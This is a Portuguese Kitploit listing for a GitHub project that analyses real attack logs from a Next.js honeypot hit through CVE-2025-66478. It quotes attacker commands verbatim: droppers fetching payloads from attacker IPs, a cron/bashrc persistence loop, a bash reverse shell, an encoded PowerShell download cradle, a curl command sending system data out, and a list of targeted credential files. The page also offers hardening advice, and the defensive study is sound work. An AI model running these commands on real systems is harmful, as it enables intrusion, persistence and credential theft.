Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/exptechtw/cve-2025-66478
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseAnálise de MalwareInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Análise de logs de ataque do mundo real do CVE-2025-66478 (Next.js Server Actions RCE) com amostras de malware, rastreamento de IP do atacante e lições de fortalecimento de segurança de contêineres.

25há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2025-66478 - Análise de Logs de Ataques Reais de RCE em Server Actions do Next.js

Resumo

Este projeto reúne logs de ataque reais registrados por uma aplicação Next.js 15.1.2 exposta na internet (executando em um contêiner Docker). Estes logs demonstram a varredura e exploração em larga escala da vulnerabilidade CVE-2025-66478 por ferramentas automatizadas de ataque.

Período de registo: 2025-12-04 ~ 2025-12-06 (aproximadamente 48 horas)

Informações do ambiente:

  • Framework: Next.js 15.1.2
  • Ambiente de execução: Bun v1.2.20
  • Contêiner: Docker (Alpine Linux)
  • Fuso horário: Ásia/Taipei

Estatísticas por tipo de ataque

1. Download e execução de malware (Dropper/Downloader)

Os atacantes tentaram executar comandos para baixar e executar malware através da vulnerabilidade.

IP de origem do ataqueURL do payload maliciosoDescrição
216.158.232.43http://216.158.232.43:12000/sex.shBotnet/minerador
38.207.161.212http://38.207.161.212/agentPrograma agente malicioso
43.156.63.124http://43.156.63.124/tsdBackdoor persistente via cron
154.38.121.219res.qiqigece.top/nginx3Malware disfarçado de nginx
47.79.42.91iot.632313373.xyz/nz.shScript de botnet IoT
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shMinerador/backdoor
103.135.101.15http://103.135.101.15/wocaosinm.shScript malicioso
38.12.24.231http://38.12.24.231/kworkerMalware disfarçado de kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shScript de inicialização

Exemplos de comandos de ataque

root@kitploit:~
# Ataque dropper típico
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Backdoor persistente via cron
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Ataque de persistência complexo (múltiplos métodos de download + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Reverse Shell

Os atacantes tentaram estabelecer conexões reverse shell para obter acesso interativo.

root@kitploit:~
# Bash reverse shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. Ataques PowerShell (erro de avaliação para Windows)

Os atacantes assumiram que o alvo era um sistema Windows e tentaram executar comandos PowerShell.

root@kitploit:~
# PowerShell malicioso codificado em Base64
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Decodificado:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Cálculos matemáticos usados para confirmação da vulnerabilidade
powershell -c "41*271"      # = 11111 (confirmação de assinatura)
powershell -c "44225*41002" # = 1814113450

4. Coleta de informações (Information Gathering)

Os atacantes tentaram coletar informações do sistema para ataques posteriores.

root@kitploit:~
# Coleta de informações do sistema e exfiltração
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Roubo de credenciais (Credential Harvesting)

Os atacantes tentaram ler vários arquivos sensíveis e credenciais.

Caminhos sensíveis tentados

6. Vazamento de variáveis de ambiente

Variáveis de ambiente do contêiner vazadas com sucesso através da vulnerabilidade:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. Exfiltração via DNS (DNS Exfiltration)

Os atacantes usaram consultas DNS para exfiltração de dados ou confirmação da vulnerabilidade:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

Motivos para a falha dos ataques

A maioria dos ataques falhou devido à natureza minimalista do contêiner Alpine Linux:

Ferramenta ausenteImpacto
curlIncapacidade de baixar payloads maliciosos
bash

Embora wget estivesse disponível, alguns scripts maliciosos internamente dependiam de curl ou bash, resultando em falha na execução.


Exemplos de decodificação Base64

Os logs contêm muitos dados codificados em Base64. Abaixo estão alguns resultados decodificados:

Exfiltração de informações do sistema

root@kitploit:~
# digest: 'cm9vdAo='
Decodificado: root

# digest: 'dGVzdAo='
Decodificado: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Decodificado: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Decodificado: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Exfiltração de listagem de diretório

root@kitploit:~
# Conteúdo do diretório /tmp
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Decodificado:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Estatísticas de IPs de ataque

Abaixo estão os endereços IP de ataque registrados:


Técnicas de exploração (Attack Vectors)

Chamada a Server Action

Os atacantes tentaram chamar Server Actions inexistentes:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

Exfiltração de informações nas respostas de erro

Os atacantes usaram o campo digest em mensagens de erro para exfiltrar dados:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // 'root' codificado em Base64

Pontos de ensino

1. Boas práticas de segurança em contêineres

  • Imagens minimalistas: Usar imagens base enxutas (como Alpine) reduz a superfície de ataque
  • Remover ferramentas desnecessárias: Não instalar curl, bash, python e outras ferramentas que possam ser abusadas
  • Sistema de arquivos somente leitura: Executar contêineres com --read-only
  • Usuário não root: Executar a aplicação com um usuário sem privilégios

2. Correção da vulnerabilidade

  • Atualizar Next.js para a versão corrigida
  • Validar entrada de Server Actions
  • Implementar regras de WAF para filtrar requisições suspeitas

3. Monitoramento e detecção

  • Monitorar execução anômala de subprocessos
  • Monitorar solicitações de conexão de rede de saída
  • Monitorar tentativas de acesso a arquivos sensíveis

Aviso Legal

Este projeto é apenas para fins educacionais e de pesquisa em segurança cibernética. Todos os ataques registrados são tentativas reais de ataque contra um honeypot de pesquisa. Não utilize estas informações para qualquer finalidade ilegal.


Amostras de malware

Este projeto contém amostras reais de malware capturadas e baixadas dos logs de ataque. Para análise detalhada, consulte:

malware_samples/ANALYSIS.md

Amostras obtidas

Resumo das técnicas de ataque

  1. nz.sh - Instala o agente de monitoramento Nezha para monitoramento remoto do host vítima
  2. tsd.sh + tsd - Cria mecanismos de persistência múltiplos (cron + systemd + rc.local)
  3. init.sh + agent - Framework de backdoor completo, suporta múltiplos sistemas, reinicialização automática, registro de logs

Recursos relacionados

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

Licença

MIT License

Baixar ferramenta
CategoriaCaminho
Credenciais cloud/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
Chaves SSH/root/.ssh/id_rsa, /root/.ssh/config
Credenciais Git/root/.git-credentials, /root/.gitconfig
Container/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Aplicação/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Histórico Shell/root/.bash_history, /root/.zsh_history
Ferramentas cloud/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Configuração do sistema/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
Incapacidade de executar sintaxe específica do bash (ex.: reverse shell)
powershellAtaques Windows ineficazes
pythonIncapacidade de usar downloader Python
Endereço IPPaís/Região (estimado)Tipo de ataque
216.158.232.43Estados UnidosDropper
38.165.44.205Estados UnidosDropper
23.95.44.80Estados UnidosDropper
154.38.121.219Hong KongMalware (nginx3)
38.207.161.212Estados UnidosAgent
43.156.63.124ChinaBackdoor cron
47.79.42.91China (Alibaba Cloud)Botnet IoT
47.79.65.237China (Alibaba Cloud)Minerador
119.45.243.154China (Tencent Cloud)Minerador
144.22.210.54BrasilDropper
217.60.249.228SuéciaDropper
154.26.192.32Estados UnidosReverse Shell
156.234.209.103DesconhecidoPayload PowerShell
38.60.212.106Estados UnidosColeta de informações
103.135.101.15VietnãBotnet
128.199.194.97Singapura (DigitalOcean)Script Setup
38.12.24.231Estados UnidosMalware persistente
ArquivoTipoTamanhoFonteNível de ameaça
nz.shShell Script931 Biot.632313373.xyzMédio
tsd.shShell Script1.7 KB43.156.63.124Alto
tsdELF 64-bit6.8 MB43.156.63.124Alto
init.shShell Script6.1 KBAWS S3Crítico
agentELF 64-bit23.7 MBAWS S3Crítico
Agtisx.exePE32+ (Windows)24.0 MBAWS S3Crítico